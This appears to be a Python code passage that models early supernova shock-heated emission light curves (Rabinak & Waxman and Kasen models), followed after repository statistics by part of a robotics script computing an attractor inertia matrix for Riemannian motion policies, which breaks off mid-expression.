Written for the SN 2015F work based on the Rabinak & Waxman (2011) model [2015. M. Im].
Currently, the explosion energy is set to 10^51 erg which is appropriate for Type Ia SN.
This value may need to be changed for other types of SNe.
Also, at the end of the program, you will encounter the line
fearly2_kasen=interpol(mbbflux,xw,6580.)
Note that the number "6580." is the effective wavelength of the filter in Angstrom.
In this case, it is set to R-band.
Please change the number if you want to plot the light curve in different bands. [2018-05-03, added by M. Im]
Slightly modified at 2018-05-03 to add comments. [2018-05-03, M. Im].
"""
import numpy as np
rstar = np.float128(rstar)
td = np.float64(td)
# Rsun = 6.955 * 10**10 cm
r10 = np.float128(rstar*6.955) # rstar in Rsun unit
r13 = np.float128(rstar*6.955e-3)
# rstar is the radius of progenitor or companion in solar radius unit.
# In K10 model, the emission is from an interaction btw the companion and the ejected materials so r13 is that of companion.
# In RW11 model, the emission is from the progenitor itself. r13 is that of progenitor
# Progenitor radius in R/10^10 cm
Mc = np.float128(1.0/1.40)
# Mass in chandrasekhar mass unit
# eff = 1.0
# efficiency of conversion of mass to light
Msun = 1.988e33 # g
c = 2.9979e10 # cm/s
# mc2 = np.log10(Msun) + 2.*np.log10(c)
# Energy in Msun*c**2
eff = 1.0
dm = np.log10(Msun) + 2. * np.log10(2.9979e10) - 51. # Difference btw E51 and Msun*c^2
loge51 = np.log10(eff*Mc) + np.log10(Msun) + 2.*np.log10(c) - 51. - dm # explosion energy in log unit (10**51 erg)
#ke = np.float128(0.2) # Opacity in K10, ke = 0.2 cm**2/g -> k02 = 1, appropriate for e- scattering in fully ionized A/Z=2 elements
k02 = np.float128(1.0) # Opacity in k/0.2cm**2/g
#fp = 0.05 # Form factor 0.031 - 0.13 (RW11)
fp = 0.05 # form factor 0.031 - 0.13
#v9 = np.float128(1.) # velocity in 10**9 cm/s unit
logLt = 40. + np.log10(1.2) + np.log10(r10) + 0.85*loge51 - 0.69*np.log10(Mc) -0.85*np.log10(k02) -0.16*np.log10(fp) - 0.35*np.log10(td) # total luminosity : early UV/optical luminosity emitted from ejecta diffusion including radioactive + cooling emission
logTeff = np.log10(4105.) + 0.25*np.log10(r10) + 0.016*loge51 + 0.03*np.log10(Mc) - 0.27*np.log10(k02) - 0.022*np.log10(fp) -0.47*np.log10(td) # Effective temperature of the early emission
c = np.float(2.9979e8) # speed of light in m/s
# wavelengh in angstrom, 1A = 10e-10 m
sigb = np.float128(5.6704e-5) # Stephan-Boltzman constant in CGS [egs*cm**-2 * s**-1 * ]
logFbb = np.log10(sigb) + 4.*logTeff # Blackbody flux of early emission
d10pc = np.float128(10. * 3.0856e18) # 10pc in cm to convert Luminosity to Flux
fluxm = (logLt - 2.*np.log10(d10pc) - np.log10(4.*np.pi)) - logFbb # Flux of shock heated emission = Total flux - blackbody component of early emission
#rph24pi = logLt - logFbb
abzero = np.float128(-48.600) # in erg*s**-1*cm**-2*Hz**-1
teff = 10.**(logTeff)
xw = 1000. + 80.*np.arange(100)
xw = np.array(xw, dtype='float128')
#from lgpy.sn2019ein_fitting import planck
bbflux = planck(xw, teff)
ff = -2.5 * (2.*np.log10(xw) -10. -np.log10(c) ) # Angstrom to Hertz conversion factor
mbbflux = -2.5*np.log10(bbflux) + ff + abzero -2.5*fluxm # convert flux to AB magnitude (Find ref in wiki).
x_data = xw
y_data = mbbflux
from scipy.interpolate import UnivariateSpline
spl = UnivariateSpline(x_data, y_data, s=0.2, k=5)
# From 1000A to 8920A, we fit BB spectrum to obtain AB magnitude in specific band from continuous value. ex) What is magnitude in 6580A? 6580 is not generated in the array wx so we fit mbbflux!
# The last input parameter in the above function (e.g., 4770., and 6580.) are the effective wavelength of the filter in Angstrom. Please modify the value, depending on which filter you use.
# 4770 : B band, 6580. : R band
x_array = np.linspace(np.min(x_data), np.max(x_data), num= int((np.max(x_data) -np.min(x_data))/80.))
if band == 'U':
fearly2 = np.float128(spl(3656.)) # https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
elif band == 'B' :
#print('Band : '+band+', eff w = 4770.')
#fearly2 = np.float128(spl(4770)) # LSGT
fearly2 = np.float128(spl(4353.)) # https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
elif band == 'V' :
fearly2 = np.float128(spl(5477.))
elif band == 'R' :
#print('Band : '+band+', eff w = 6580.')
#fearly2 = np.float128(spl(6580)) # LSGT
fearly2 = np.float128(spl(6349.)) # https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
elif band == 'I' :
#fearly2 = np.float128(spl(8175.6))
fearly2 = np.float128(spl(8797.))
elif band == 'g' :
fearly2 = np.float128(spl(4770.))
elif band == 'r' :
fearly2 = np.float128(spl(6231.))
return fearly2
def fearly2_kasen(td, rstar, band):
"""
This function produces the shock-heated emssion light curve. Written for the SN 2015F work based on the Kasen (2010) model [2015. M. Im].
Currently, the explosion energy is set to 10^51 erg which is appropriate for Type Ia SN.
This value may need to be changed for other types of SNe.
Also, at the end of the program, you will encounter the line
fearly2_kasen=interpol(mbbflux,xw,6580.)
Note that the number "6580." is the effective wavelength of the filter in Angstrom.
In this case, it is set to R-band. Please change the number if you want to plot the light curve in different bands. [2018-05-03, added by M. Im]
Slightly modified at 2018-05-03 to add comments. [2018-05-03, M. Im].
* Size and Mass relation (Kasen 2010)
1 - 3 Msun, MS : R* = 1 - 3 x 10**11cm
5 - 6 Msun, MS subgiant : R* = 5 x 10**11cm
1 - 2 Msun, Red giant : R* ~ 10**13cm
"""
import numpy as np
# rstar = 1.0
# td = 0.5
# band = 'R'
rstar = np.float128(rstar)
td = np.float64(td)
# Rsun = 6.955 * 10**10 cm
r10 = np.float128(rstar*6.955) # rstar in Rsun unit
r13 = np.float128(rstar*6.955e-3)
# rstar is the radius of progenitor or companion in solar radius unit.
# In K10 model, the emission is from an interaction btw the companion and the ejected materials so r13 is that of companion.
# In RW11 model, the emission is from the progenitor itself. r13 is that of progenitor
# Progenitor radius in R/10^10 cm
Mc = np.float128(1.0/1.40)
# Mass in chandrasekhar mass unit
# eff = 1.0
# efficiency of conversion of mass to light
# Msun = 1.988e33 # g
# c = 2.9979e10 # cm/s
# mc2 = np.log10(Msun) + 2.*np.log10(c)
# Energy in Msun*c**2
ke = np.float128(1.0) # Opacity in K10, ke = 0.2 cm**2/g -> k02 = 1, appropriate for e- scattering in fully ionized A/Z=2 elements
k02 = np.float128(5.0) # Opacity in k/0.2cm**2/g
#fp = 0.05 # Form factor 0.031 - 0.13 (RW11)
v9 = np.float128(1.) # velocity in 10**9 cm/s unit
logLt = 43. + np.log10(2*r13) + 0.25*np.log10(Mc) + (7./4.)*np.log10(v9) + (-0.75)*np.log10(ke) + (-0.5)*np.log10(td) # total luminosity : early UV/optical luminosity emitted from ejecta diffusion including radioactive + cooling emission
logTeff = np.log10(2.5) + 4. + 0.25*np.log10(2.*r13) - (35./36.)*np.log10(ke) - (37./72.)*np.log10(td) # Effective temperature of the early emission
c = np.float(2.9979e8) # speed of light in m/s
# wavelengh in angstrom, 1A = 10e-10 m
sigb = np.float128(5.6704e-5) # Stephan-Boltzman constant in CGS [egs*cm**-2 * s**-1 * ]
logFbb = np.log10(sigb) + 4.*logTeff # Blackbody flux of early emission
d10pc = np.float128(10. * 3.0856e18) # 10pc in cm to convert Luminosity to Flux
fluxm = (logLt - 2.*np.log10(d10pc) - np.log10(4.*np.pi)) - logFbb # Flux of shock heated emission = Total flux - blackbody component of early emission
abzero = np.float128(-48.600) # in erg*s**-1*cm**-2*Hz**-1
teff = 10.**(logTeff)
xw = 1000. + 40.*np.arange(200)
#xw = 1000. + 80.*np.arange(100)
xw = np.array(xw, dtype='float128')
#from lgpy.sn2019ein_fitting import planck
bbflux = planck(xw, teff)
ff = -2.5 * (2.*np.log10(xw) -10. -np.log10(c) ) # Angstrom to Hertz conversion factor
mbbflux = -2.5*np.log10(bbflux) + ff + abzero -2.5*fluxm # convert flux to AB magnitude (Find ref in wiki).
x_data = xw
y_data = mbbflux
from scipy.interpolate import UnivariateSpline
spl = UnivariateSpline(x_data, y_data, s=0.2, k=5)
# From 1000A to 8920A, we fit BB spectrum to obtain AB magnitude in specific band from continuous value. ex) What is magnitude in 6580A? 6580 is not generated in the array wx so we fit mbbflux!
# The last input parameter in the above function (e.g., 4770., and 6580.) are the effective wavelength of the filter in Angstrom. Please modify the value, depending on which filter you use.
# 4770 : B band
# 5477 : V band https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
# 6580. : R band
x_array = np.linspace(np.min(x_data), np.max(x_data), num= int((np.max(x_data) -np.min(x_data))/80.))
if band == 'U':
fearly2 = np.float128(spl(3656.)) # https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
if band == 'B' :
#print('Band : '+band+', eff w = 4770.')
#fearly2 = np.float128(spl(4770)) # LSGT
fearly2 = np.float128(spl(4353.)) # https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
elif band == 'V' :
fearly2 = np.float128(spl(5477.))
elif band == 'R' :
#print('Band : '+band+', eff w = 6580.')
#fearly2 = np.float128(spl(6580)) # LSGT
fearly2 = np.float128(spl(6349.)) # https://www.aip.de/en/research/facilities/stella/instruments/data/johnson-ubvri-filter-curves
elif band == 'I' :
#fearly2 = np.float128(spl(8175.6))
fearly2 = np.float128(spl(8797.))
elif band == 'g' :
fearly2 = np.float128(spl(4770.))
elif band == 'r' :
fearly2 = np.float128(spl(6231.))
# I (CTIO/ANDICAM.I_KPNO): lamb_eff : 8175.6
# J (UKIRT) : 12483.0
# H (UKIRT) : 16313.0
# K (UKIRT) : 22010.0
return fearly2
def fearly3_kasen(td, rstar, band):
"""
This function produces the shock-heated emssion light curve. Written for the SN 2015F work based on the Kasen (2010) model [2015. M. Im].
Currently, the explosion energy is set to 10^51 erg which is appropriate for Type Ia SN.
This value may need to be changed for other types of SNe.
Also, at the end of the program, you will encounter the line
fearly3_kasen=interpol(mbbflux,xw,6580.)
Note that the number "6580." is the effective wavelength of the filter in Angstrom.
In this case, it is set to R-band. Please change the number if you want to plot the light curve in different bands. [2018-05-03, added by M. Im]
Slightly modified at 2018-05-03 to add comments. [2018-05-03, M. Im].
fearly3_kasen provides the size of the companion when you enter magnitude. [2020-08-24, added by G. Lim]
* Size and Mass relation (Kasen 2010)
1 - 3 Msun, MS : R* = 1 - 3 x 10**11cm
5 - 6 Msun, MS subgiant : R* = 5 x 10**11cm
1 - 2 Msun, Red giant : R* ~ 10**13cm
"""
import numpy as np
# rstar = 1.0
# td = 0.5
# band = 'R'
rstar = np.float128(rstar)
td = np.float64(td)
# Rsun = 6.955 * 10**10 cm
r10 = np.float128(rstar*6.955) # rstar in Rsun unit
r13 = np.float128(rstar*6.955e-3)
# rstar is the radius of progenitor or companion in solar radius unit.
# In K10 model, the emission is from an interaction btw the companion and the ejected materials so r13 is that of companion.
# In RW11 model, the emission is from the progenitor itself. r13 is that of progenitor
# Progenitor radius in R/10^10 cm
Mc = np.float128(1.0/1.40)
# Mass in chandrasekhar mass unit
# eff = 1.0
# efficiency of conversion of mass to light
# Msun = 1.988e33 # g
# c = 2.9979e10 # cm/s
# mc2 = np.log10(Msun) + 2.*np.log10(c)
# Energy in Msun*c**2
ke = np.float128(1.0) # Opacity in K10, ke = 0.2 cm**2/g -> k02 = 1, appropriate for e- scattering in fully ionized A/Z=2 elements
k02 = np.float128(5.0) # Opacity in k/0.2cm**2/g
#fp = 0.05 # Form factor 0.031 - 0.13 (RW11)
v9 = np.float128(1.) # velocity in 10**9 cm/s unit
c = np.float(2.9979e8) # speed of light in m/s
# wavelengh in angstrom, 1A = 10e-10 m
sigb = np.float128(5.6704e-5) # Stephan-Boltzman constant in CGS [egs*cm**-2 * s**-1 * ]
logLt = 43. + np.log10(2*r13) + 0.25*np.log10(Mc) + (7./4.)*np.log10(v9) + (-0.75)*np.log10(ke) + (-0.5)*np.log10(td) # total luminosity : early UV/optical luminosity emitted from ejecta diffusion including radioactive + cooling emission (This is observed data.)
'''
# (1) Observed total flux
flux_obs = 2165.7
# (2) Cooling emission
flux_cooling = 839.4
# (3) Ni (Simple power-law) flux
flux_Ni = 1326.32
### Into AB mag to Flux
#mbbflux = -2.5*np.log10(bbflux) + ff + abzero -2.5*fluxm
mag_obs = 18.913
mag_Ni = 19.193
abzero = np.float128(-48.600) # in erg*s**-1*cm**-2*Hz**-1
flux_Ni_Jy = 10.**(23-(mag_Ni+48.6)/2.5 ) # AB to Jansky
flux_Ni_Hz = flux_Ni_Jy*1.e-23 # Jansky to erg s-1 Hz-1 cm-2
HzToAng = (c/( (wav*1e-10)**2)) #
flux_Ni_wav = flux_Ni_Hz * HzToAng
logflux_Ni = np.log10(flux_Ni)
### Temp. of Observed flux (Early emission)
logTeff = (np.log10(flux_Ni_wav) - np.log10(sigb))/4.
0.25*np.log10(2.*r13) = logTeff -np.log10(2.5) - 4. +(35./36.)*np.log10(ke) + (37./72.)*np.log10(td)
###
log2r13 = logLt - 43 -0.25*np.log10(Mc) -(7./4.)*np.log10(v9)+ 0.75*np.log10(ke) + (0.5)*np.log10(td)
'''
# ----
logTeff = np.log10(2.5) + 4. + 0.25*np.log10(2.*r13) - (35./36.)*np.log10(ke) - (37./72.)*np.log10(td) # Effective temperature of the early emission
logFbb = np.log10(sigb) + 4.*logTeff # Blackbody flux of early emission (Ni decay part), bolometric
d10pc = np.float128(10. * 3.0856e18) # 10pc in cm to convert Luminosity to Flux
fluxm = (logLt - 2.*np.log10(d10pc) - np.log10(4.*np.pi)) - logFbb # Flux of shock heated emission = Total flux - blackbody component of early emission (Ni decay part), bolometric
abzero = np.float128(-48.600) # in erg*s**-1*cm**-2*Hz**-1
teff = 10.**(logTeff)
#xw = 1000. + 40.*np.arange(200)
#xw = np.array(xw, dtype='float128')
#from lgpy.sn2019ein_fitting import planck
#bbflux = planck(xw, teff)
if band == 'B' :
xw = 4353.
bbflux = planck(xw, teff)
elif band == 'V' :
xw = 5477.
bbflux = planck(xw, teff)
elif band == 'R' :
xw = 6349.
bbflux = planck(xw, teff)
elif band == 'I' :
xw = 8797.
bbflux = planck(xw, teff)
elif band == 'g' :
xw = 4770.
bbflux = planck(xw, teff)
elif band == 'r' :
xw = 6231.
bbflux = planck(xw, teff)
ff = -2.5 * (2.*np.log10(xw) -10. -np.log10(c) ) # Angstrom to Hertz conversion factor
mbbflux = -2.5*np.log10(bbflux) + ff + abzero -2.5*fluxm # convert flux to AB magnitude (Find ref in wiki), Bolometric.
return mbbflux
'''
def MAG_Kasen(td, rstar, band):
"""
fearly2_kasen
#u.M_sun.cgs # Solar mass
#c.c.cgs # Speed of light
"""
import numpy as np
import astropy.units as u
from astropy import constants as c
r13 = (rstar*u.R_sun/1.e+13).value
eff = 1.0
Mc = 1.0/1.4
dm = np.log10(Msun) + 2. * np.log10(2.9979e10) - 51. # Difference btw E51 and Msun*c^2
'''
def lcearly(rstar, band, fig=True):
"""
Draw theoritical model of early light curve caused by Shock-heated emission.
rstar : 0.1, 1
band : 'B', 'R'
# Marion+16
RG = 2*1e13cm
6M MS = 2*1e12cm
2M MS = 5*1e11cm
# Kasen 2010
1-2M RG = ~1e13cm (2 times)
5-6M SG = 5*1e11cm (4 times)
1-3M MS = 1-3e11cm (~2.5 times)
"""
import numpy as np
import matplotlib.pyplot as plt
#from lgpy.sn2019ein_fitting import fearly2_kasen
#rstar = [0.1, 0.6, 1.0, round((5.*1.e+11*u.cm).to(u.R_sun).value,3),round((2.*1.e+12*u.cm).to(u.R_sun).value,3), round((2.*1.e+13*u.cm).to(u.R_sun).value,3)]
#rstar = [0.1, 0.6, 1.0, round((5.*1.e+11*u.cm).to(u.R_sun).value,3),round((2.*1.e+12*u.cm).to(u.R_sun).value,3), round((2.*1.e+13*u.cm).to(u.R_sun).value,3)]
#rstar = [0.1, 0.6, 1.0, round((5.*1.e+11*u.cm).to(u.R_sun).value,3),round((2.*1.e+12*u.cm).to(u.R_sun).value,3), 50.]
td = 0.01 + 0.01*np.arange(2000)
y = []
for i in range(len(td)) :
y_dum = fearly2_kasen(td[i], rstar, band)
y.append(y_dum)
#rmg = np.array(y) + 31.16
#dl=[10.,20.,50.]
#rmg1=np.array(y) + 5.*np.log10(dl[0])+25.
#rmg2=np.array(y) + 5.*np.log10(dl[1])+25.
#rmg3=np.array(y) + 5.*np.log10(dl[2])+25.
fig, ax1 = plt.subplots(figsize=(6,5))
ax1.set_ylim(np.max(y), np.min(y))
ax1.plot(td, y, color='black', linewidth=2, linestyle='--')
| 48.627907
| 266
| 0.623678
| 3,178
| 18,819
| 3.669604
| 0.142857
| 0.046218
| 0.029155
| 0.034299
| 0.814783
| 0.807323
| 0.799091
| 0.787858
| 0.782885
| 0.780998
| 0
| 0.121845
| 0.231574
| 18,819
| 386
| 267
| 48.753886
| 0.6846
| 0.547797
| 0
| 0.71519
| 0
| 0
| 0.006402
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044304
| false
| 0
| 0.063291
| 0
| 0.139241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
932ab3123ffd8956907f55b5d6e22a832304147e
| 59,824
|
py
|
Python
|
py/rmp_fromGDS_attract_xi_M.py
|
YoshimitsuMatsutaIe/manipulator_dynamics
|
587b3cedddd07c2aa09d1195289b0c312e0fc749
|
[
"MIT"
] | null | null | null |
py/rmp_fromGDS_attract_xi_M.py
|
YoshimitsuMatsutaIe/manipulator_dynamics
|
587b3cedddd07c2aa09d1195289b0c312e0fc749
|
[
"MIT"
] | null | null | null |
py/rmp_fromGDS_attract_xi_M.py
|
YoshimitsuMatsutaIe/manipulator_dynamics
|
587b3cedddd07c2aa09d1195289b0c312e0fc749
|
[
"MIT"
] | null | null | null |
"""RMP from GDSのアトラクトにおける曲率項を計算"""
import numpy as np
from math import exp, tanh
def attract_M(x, dx, sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon):
"""アトラクター慣性行列を計算"""
x0 = x[0, 0]
y0 = x[1, 0]
z0 = x[2, 0]
x_norm = np.linalg.norm(x)
# dx0 = dx[0, 0]
# dy0 = dx[1, 0]
# dz0 = dx[2, 0]
M = np.array([
[(w_l*(1 - exp(-(x_norm**2)**1.0/(2*sigma_gamma**2))) + w_u*exp(-(x_norm**2)**1.0/(2*sigma_gamma**2)))*(epsilon + x0**2*(1 - exp(-2*alpha*(x_norm**2)**0.5))**2*(1 - exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))*(x_norm**2)**(-1.0)/(1 + exp(-2*alpha*(x_norm**2)**0.5))**2 + exp(-(x_norm**2)**1.0/(2*sigma_alpha**2))), -x0*y0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, -x0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2],
[-x0*y0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, (w_l*(1 - exp(-(x_norm**2)**1.0/(2*sigma_gamma**2))) + w_u*exp(-(x_norm**2)**1.0/(2*sigma_gamma**2)))*(epsilon + y0**2*(1 - exp(-2*alpha*(x_norm**2)**0.5))**2*(1 - exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))*(x_norm**2)**(-1.0)/(1 + exp(-2*alpha*(x_norm**2)**0.5))**2 + exp(-(x_norm**2)**1.0/(2*sigma_alpha**2))), -y0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2],
[-x0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, -y0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, (w_l*(1 - exp(-(x_norm**2)**1.0/(2*sigma_gamma**2))) + w_u*exp(-(x_norm**2)**1.0/(2*sigma_gamma**2)))*(epsilon + z0**2*(1 - exp(-2*alpha*(x_norm**2)**0.5))**2*(1 - exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))*(x_norm**2)**(-1.0)/(1 + exp(-2*alpha*(x_norm**2)**0.5))**2 + exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))]
])
return M
def attract_xi_M(x, dx, sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon):
"""アトラクター力における曲率項を計算"""
x0 = x[0, 0]
y0 = x[1, 0]
z0 = x[2, 0]
x_norm = np.linalg.norm(x)
dx0 = dx[0, 0]
dy0 = dx[1, 0]
dz0 = dx[2, 0]
#sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon = 1, 1, 1, 1, 1, 1
xi_M = np.array([
[x_norm**(-61.0)*(dx0*(dx0*x0*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 6*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (sigma_alpha**2 + 2*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)))*x_norm**7.0*exp((2*sigma_alpha**2 + 7*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + (dy0*y0 + dz0*z0)*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 5*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (sigma_alpha**2 + 2*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2))*x_norm**8.0*exp((sigma_alpha**2 + 4*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)))*x_norm**46.0*exp((27*sigma_alpha**2 + 38*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*x_norm**45.0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dx0*sigma_alpha**2*x0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*sigma_gamma**2*x0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (7*sigma_alpha**2 + 